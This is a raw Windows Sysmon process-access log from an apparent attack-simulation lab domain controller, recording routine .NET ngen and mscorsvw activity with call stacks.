14:58:56.606{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-4D0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.606{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-4D0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.606{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-4D0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.544{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-4C0F-00000000BB01}4224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.544{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-4C0F-00000000BB01}4224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.544{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-4C0F-00000000BB01}4224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.434{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-4B0F-00000000BB01}6728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.419{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-4B0F-00000000BB01}6728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.419{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-4B0F-00000000BB01}6728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.372{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-4A0F-00000000BB01}7024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.372{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-4A0F-00000000BB01}7024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.372{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-4A0F-00000000BB01}7024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.341{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-490F-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.325{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-490F-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.325{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-490F-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.278{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-480F-00000000BB01}5996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.278{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-480F-00000000BB01}5996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.278{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-480F-00000000BB01}5996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.231{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-470F-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.231{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-470F-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.231{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-470F-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.184{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-460F-00000000BB01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.184{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-460F-00000000BB01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.184{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-460F-00000000BB01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v